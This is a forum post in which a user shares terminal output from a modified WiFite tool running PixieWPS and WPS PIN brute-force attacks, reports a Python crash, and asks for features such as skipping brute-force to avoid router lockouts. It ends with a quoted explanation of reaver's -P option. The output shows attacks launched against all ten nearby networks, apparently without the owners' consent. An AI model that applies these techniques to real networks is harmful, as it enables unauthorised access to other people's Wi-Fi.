Just so I can run original and your wifite, I renamed yours wifitemod:
Heres output with new version with pixiewps timeout:
Code:
~/wifite-mod-pixiewps-master# ./wifitemod -wps
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
modified by aanarchyy(aanarchyy@gmail.com)
Credits to wiire,DataHead,soxrok2212,nxxxu
[+] targeting WPS-enabled networks
[+] scanning for wireless devices...
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 DG167**** 1 WPA2 36db Locked
2 FiOS-S**** 1 WPA2 23db wps
3 SprintGatew**** 1 WPA2 21db wps
[0:00:32] scanning wireless networks. 3 targets and 2 clients found
[+] checking for WPS compatibility... done
[+] removed 47 non-WPS-enabled targets
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 DG167**** 1 WPA2 36db Locked
2 TG167**** 11 WPA2 25db wps
3 FiOS-S**** 1 WPA2 24db wps
4 TDS 6 WPA2 22db wps
5 TG167**** 1 WPA2 21db wps
6 MiamiHEAT 11 WPA2 20db wps
7 U10C0**** 1 WPA 18db wps
8 SprintGate**** 1 WPA2 18db wps
9 DIRECT-pm-BR**** 1 WPA2 18db wps
10 DG167**** 1 WPA2 15db wps
[+] select target numbers (1-10) separated by commas, or 'all': all
[+] 10 targets selected.
[0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[!] unable to complete successful try in 60 seconds
[+] skipping pixiewps on DG167****
[+] Pixiewps attack failed!
[0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
^C0:00:18] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[+] 9 targets remain
[+] what do you want to do?
[c]ontinue attacking targets
[e]xit completely
[+] please make a selection (c, or e): c
[0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)
[!] unable to complete successful try in 60 seconds
[+] skipping pixiewps on TG167****
[+] Pixiewps attack failed!
[0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
^C0:00:22] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[+] 8 targets remain
[+] what do you want to do?
[c]ontinue attacking targets
[e]xit completely
[+] please make a selection (c, or e): c
[0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[+] E-Hash1 found
[+] E-Hash2 found
Traceback (most recent call last):
File "./wifitemod", line 3124, in <module>
main()
File "./wifitemod", line 321, in main
need_handshake = not wps_attack(iface, t)
File "./wifitemod", line 2912, in wps_attack
line = f.readline()
UnboundLocalError: local variable 'f' referenced before assignment
Timeout for pixie worked. but another error above.
Please make pixie timeout configureable.
also option if pixewps fail, no brutefructe, move to next target.
Please consider because failed attempt locked router
Code:
For those wondering what reavers -P option is intended for:
Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with intent of:
----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.
by datahead